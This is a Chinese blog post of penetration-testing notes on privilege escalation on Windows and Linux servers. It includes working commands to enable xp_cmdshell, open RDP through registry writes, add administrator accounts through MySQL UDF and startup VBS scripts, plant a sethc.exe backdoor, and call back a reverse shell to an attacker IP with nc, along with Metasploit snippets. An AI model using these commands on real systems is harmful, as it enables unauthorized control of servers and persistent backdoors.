渗透测试之提权

最新推荐文章于 2023-06-26 11:10:35 发布
最新推荐文章于 2023-06-26 11:10:35 发布
阅读量591 收藏 3
点赞数
文章标签: 服务器 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Forget_liu/article/details/130526718
版权

大纲:

提权前

Windows提权          第三方软件提权,数据库提权,溢出提权

Linux提权

提权前

什么是提权?

         主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。

 

此时已经获得了站点的webshell权限,提权后获得服务器权限,就可以对站点B,C进行操作。

网络安全知识分享

常见脚本所处的权限

asp/PHP            匿名权限(网络服务权限,权限较小)

aspx          user权限(普通用户权限)

jsp             系统权限(通常)

收集信息

         内外网

         服务器系统和版本位数

         服务器的补丁情况

         服务器的安装软件情况

         服务器的防护软件情况

         端口情况

         支持脚本的情况

信息收集常用命令

Windows:

         ipconfig /all                查看当前ip

         net user                      查看当前服务器账号情况

         netstat –ano             查看当前服务器端口开放情况

         ver                               查看当前服务器操作糸统

         systeminfo                 查看当前服务器配置信息(补丁情况)

         tasklist /svc               查看当前服务器进程

         taskkill –PID ID号   结束某个pid号的进程

         taskkill lim qq.exe /f         结束qq进程

         net user abc abc /add      添加一个用户名为abc密码为abc的用户

         whoami                      查看当前操作用户(当前权限)

Linux:

         ls –al                  查看当前服务器的文件和文件夹

         pwd                   查看当前操作路径

         uname      -a      查看当前服务器的内核信息

cmd命令执行

         1、防护软件拦截

         2、cmd被降权

         3、组件被删除

         找到可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用。

查找3389

         1、注册表读取

         2、工具扫描

         3、命令探针

Windows提权

         第三方软件提权

         溢出提权

         启动项提权

         破解hash提权

         数据库提权

常见的第三方软件提权

         FTP软件:

         server –u、g6ftp、FileZilla

         远程管理软件:

         PCanywhere、readmin、vnc

server-u提权

         有修改权限

         0、检查是否有可写权限,修改server-u,默认安装目录下的servUDaemou.ini

         1、增加用户

         2、连接

         3、执行命令

         quote site exec bet user abc abc.com /add

         quote site exec net localgroup administertors abc /add

无修改权限

         暴力破解mds

         溢出提权

G6ftp提权

         下载管理配置文件,将administrator管理密码破解

         使用lcx端口转发(默认只允许本机连接)

         lcx.exe –tran 8027 127.0.0.1 8021

         使用客户端管理员用户登录

         创建用户并设置权限和执行的批处理文件

         上传批处理

         已创建的普通用户登录ftp

         执行命令quate site x.bat

         x.bat内容为添加系统用户 提权

filezilla提权

         filezilla是一款开源的ftp服务器和客户端的软件

         若安装了服务器默认只监听127.0.0.1的14147端口

         并且默认安装目录下有两个敏感文件

         filezillaserver.xml(包含了用户信息)

         filezillaserver interface.xml(包含了管理信息)

         提权思路

         下载这两个文件,拿到管理密码

         配置端口转发,登录远程管理ftpserver创建ftp用户

         分配权限,设置家目录为c:\

         使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门

         连接3389按5次shift调出cmd.exe

         query user       显示管理员是否在线

vnc提权

通过读到注册表十进制数

         转换成十六进制数

         破解十六进制数得到密码

         vncx4.exe –W 回车

         输入转换后的十六进制数

         连接vnc

radmin提权

         通过端口扫描 扫描4899端口

         上传radmin.asp木马读取radmin的加密密文

         使用工具连接

远程管理软件提权

         pcanywhere

         访问pcanywhere默认安装目录

         下载用户配置文件

         通过破解用户密码文件

 

溢出提权

         主要是通过Windows漏洞利用来获取系统权限

         常见的溢出提权

         巴西烤肉

         pr

         步骤:

         1、通过信息搜集查看服务器打了哪些补丁

         2、根据未打的补丁漏洞进行利用即可

破解hash提权

         上传pwdump.exe远程获取hash值

         拿到lc5彩虹表破解

         即可得到管理员密码

         需要管理员权限方可执行读取hash操作

启动项提权

         前提写入的目录需要写入权限

         将批处理文件上传到开机启动项目录等待管理员重启即可

数据库提权

         SQLserver数据库提权

         mysql数据库提权

         需要具备数据库管理员权限才可以执行提权操作

        

msSQL提权

         安装组件

         开启3389

         创建用户

         提升权限

         完成

         sa账号的获取,查看config.asp、conn.asp等文件

msSQL安装执行命令组件

         安装cmd_shell组件

         exec sp_configure ‘show advanced options’, 1

         go

         reconfigure

         go

         exec sp_configure ‘xp_cmdshell’, 1

         go

         reconfigure

         go

3389操作语句

         开启3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--

         关闭3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--

删除cmd_shell组件

         exec sp_configure ‘show advancer options’, 1

         go

         reconfigure

         go

         exec sp_configure xp_cmdshell; 0

         go

         reconfigure

         go

mysql数据库提权

         udf提权

         启动项提权

         maf提权

         反链端口提权

udf提权

         获取到对方的mysql数据库下的root账号密码

         1、查看网站源码里面数据库配置文件

         (inc、conn、config.sql、common、data等)

         2、查看数据库安装路径下的user.myd(/data/mysql)

         3、暴力破解mysql密码,破解3306端口入侵

udf提权原理

         通过root权限导出udf.dll到系统目录下,可以通过udf.dll调用执行cmd

c:\winnt\udf.dll 2000

c:\windows\udf.dll 2003

现在基本上win的服务器就这两个导出udf.dll

5.1以上版本需要导出到mysql安装目录lib\plugin\

create function cmdshell returns string soname ‘udf.dll’

select cmdshell (‘net user abc abc /add’);

select cmdshell (‘net localgroup administrators abc /add’);

drop function cmdshell; 删除函数

启动项提权

         1、查看我们进入数据库中有什么数据表

         mysql>show tables;

         默认情况下,test中没有任何表的存在

         以下为关键部分

         2、在TEST数据库下创建一个新的表

         mysql>create table a (cmd text);

         此时创建了一个新表,表名为a,表中只存放一个字段名为cmd的text文件

         3、在表中插入内容

         mysql>insert into a values (“set wshshell=createobject(“”wscript.shell””)”)

  mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);

  mysql>insert into a values (“b=wshshell.ru (“”cmd.exe /c net localgroup administrators 1 /add”,0)”);

  注意,双引号和括号以及后面的“0”一定要输入,用这三条命令来建立一个VBS的脚本程序。

  4、mysql>select * from a;

  此时表中有三行数据,就是前面的VBS的脚本程序

  5、输出表为一个VBS的脚本文件

  mysql>select * from a into outfile “c://document//administrator//[开始]菜单//程序//启动//a.vbs”;

  6、重启

mof提权

         第一种方法:

         上传mof.php

         输入相关信息,执行命令,提权

         第二种方法:

         上传x.mof

         使用select命令导出到正确位置

         select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’

         允许外部地址使用root用户连接的SQL语句

         grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;

反链端口提权

         利用mysql客户端工具连接mysql服务器,然后执行以下操作

         1、执行命令

         mysql.exe –h 172.16.10.11 –uroot –p

         enter password:

         mysql>\.c”\mysql.txt

         mysql>select backshell(“yourip”,2010);

         2、本地监听反弹的端口

         nc.exe –vv –l –p 2010

         成功后,会获得一个system权限的cmdshell

内网端口转发

         内网主机输入命令

         lcx.exe –slave 外网ip 外网端口 内网ip 内网端口

         lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389

         外网主机输入命令

         lcx.exe –listen 111 1311

         开启3389

         使用

         批处理文件开3389

         使用sql语句开3389

         使用exe开3389

         使用vb开3389

一些命令的利用

         type E:\wwwroot\web.config 查看文件内容

         cacls命令

         /T:更改当前目录及其有子目录中指定的acl

         /E:编辑acl而不替换

         /C:在出现拒绝访问错误的时候继续

         /G Userver:perm:赋了指定用户访问权限,perm代表不同级别的访问权限,其值可以是R(读),W(写),C(该),F(安全控制)等

/R user:撤销指定用户的访问权限,注意该参数仅在与“/E”一起使用的时候有效

  要修改一个文件的权限必要条件

  要有USERS组的完全控制权限

  cmd权限

Linux提权

         内核溢出提权

         mysql ndf提权

         利用SUID提权

         利用环境变量,劫持该劝的程序提权

内核溢出提权

         查看内核

         uname –r

         反弹shell执行命令

         上传exp

         编译

         执行

         根据内核版本查找对应的漏洞

         收集exp

mysql udf提权

         上传库文件

         执行库文件创建命令执行函数

        

利用SUID提权

         寻找系统里可以用的SUID文件来提权

         $find /-perm –u=s –type f 2>/dev/null

白帽小衫
关注
【网络安全】内网渗透(二):权限
wuli1024的博客
01-06 1833
本文将会介绍,主要通过三种方式:高程序运行级别,UAC 绕过,利用漏洞进行
渗透测试基础
最新发布
m0_52484587的博客
07-13 301
攻击者在攻击服务器时,使用远程溢出这种溢出攻击这种攻击手段是比较少的,服务器通常都打了漏洞补丁,这样旧的溢出漏洞一般不会再起作用,而新的溢出漏洞少之又少,可以说远程溢出漏洞已经"日落西山"了。本地溢出首先要有服务器的一个用户,且需要有执行的权限的用户才能发起,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出root权限。远程溢出是指攻击者只需要与服务器建立连接,然后根据系统的漏洞,使用响应的溢出程序,即可获取到远程服务器的root权限
渗透测试——权限
世间繁华梦一出
03-01 1969
一、什么是二、怎样进行的方式有哪些)1、系统漏洞Linux、Windows) 一、什么是 就是通过各种办法和漏洞,升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行的方式有哪些) 1、系统漏洞Linux、Windows) 2、数据库 3、系统配置错误 4、权限继承类 5、第三方软件/服务 6、WebServer漏洞 1、系统
渗透测试方式总结
qq_29864185的博客
07-06 2398
目录 一、 什么是 二、怎样进行的方式有哪些) 1、系统漏洞 (1)Windows (2)Linux系统 2、数据库 (1)MySQL数据库 3、系统配置不当 4、权限继承类 5、第三方软件/服务6、WebServer漏洞 一、 什么是 就是通过各种办法和漏洞,高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
渗透测试-
分享学习网络的点点滴滴
06-09 155
Keylogger木马窃取密码窃取 使用wce去修改用户 首先我们看系统有两个用户,现在我们把sbz改成administrator
方式及原理简介(面试)
jklbnm12的博客
02-21 2504
一、 想了解原理首先要明白什么叫,为什么要,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫。 二、方式 1、系统本地漏洞 2、数据库 3、第三方软件 4、获取权限用户比如msf的getsystem等 三、分类 Windows Windows一般为系统漏洞, wmic qf
渗透测试 (udf+mof+启动项
LKmnbZ's Blog
11-07 5821
1. 权限给高权限取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 权限以创建和抛弃函...
Kali Linux渗透测试(一)——本地
橘子女侠
04-23 7373
本地 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限; 本地一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单地说,本地漏洞就是说一个本来非常低权限、受限制的用户,可以升到系统至高无上的权限权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基...
Kali渗透测试1——本地
浅浅的博客
05-05 1779
本地 定义:我们已经登录到目标系统的计算机上,拿到目标系统的shell,在这个shell基础之上,进行。 现在的操作系统都是多用户操作系统,一个操作系统可以设置多个用户账号,这些账号可以是用户账号,也可以是为某个应用程序专门设置的应用程序账号。这样做的目的是进行不同账号之间权限的隔离,因为所有的事情都由一个账号去做的话,必须赋予该账号最大的权限,...
Kali Linux渗透测试(三)——利用配置不当
橘子女侠
04-24 1069
利用漏洞进行:已经成功渗透进目标系统; 目标:利用系统本身的漏洞进行; 利用配置不当:已经成功渗透进目标系统; 相比利用漏洞,是更常用的方法; 在大部分企业中,会将系统的漏洞即时进行补丁更新,难以通过系统自身我的漏洞进行入侵; 可以查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式; 可以查找NTFS权限允许use...
渗透测试
07-18
本文档描述了渗透的基本套路
渗透测试笔记】之【
AA8j的博客
06-03 582
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
渗透怎么学?渗透测试中超全的思路来了!
bdfcfff77fa的博客
06-26 1287
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
渗透测试框架
weixin_43873557的博客
02-10 210
01 Metasploit模块 ➢ Meterpreter自动命令 getsystem getuid ➢ 命令执行失败,绕过uac use exploit/windows/local/bypassuac set payload windows/meterpreter/reverse_tcp set LHOST=192.168.1.170 set session 1 exploit use exploit/windows/local/bypassuac_injection set payloa
渗透测试技术----(本地)
wwl012345的博客
07-22 3051
一、开启Kali共享文件夹(拓展,与无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
渗透测试——方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是 就是通过各种办法和漏洞,高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行的方式有哪些) 1.、系统漏洞Linux、Windows) 2、数据库 3、系统配置错误 4、权限继承类 5、第三方软件...
渗透测试指南
遇事不决冲冲冲
12-04 7895
windows系统 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行 参考Windows系统内核溢出漏洞 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的EXP进行(挺离谱的感觉) 系统漏洞与对应的
118.网络安全渗透测试—[权限升篇16]—[Windows MSF模块&审计工具]
qwsn
07-08 5007
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)生成攻击载核:(2)msf开启监听: (3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低权限的shell: (4)当前session下执行漏洞检测模块: #这里没有扫描到漏洞,可以换个方法扫描 当然了也可以指定session进行漏洞检测: (5)挂起session,在Metasploit控制台下search搜索2008 #根据关键字搜索,晒选结果中loc
渗透测试-权限
weixin_46626737的博客
03-13 613
比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定时任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试(msf或者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。
渗透测试linux
05-30
渗透测试Linux是指在Linux系统中通过各种手段获取管理员权限的过程。常见的渗透测试Linux方法包括: 1. 利用系统漏洞:渗透测试人员通过分析系统漏洞,找到可以利用的漏洞,并利用漏洞获取管理员权限。 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值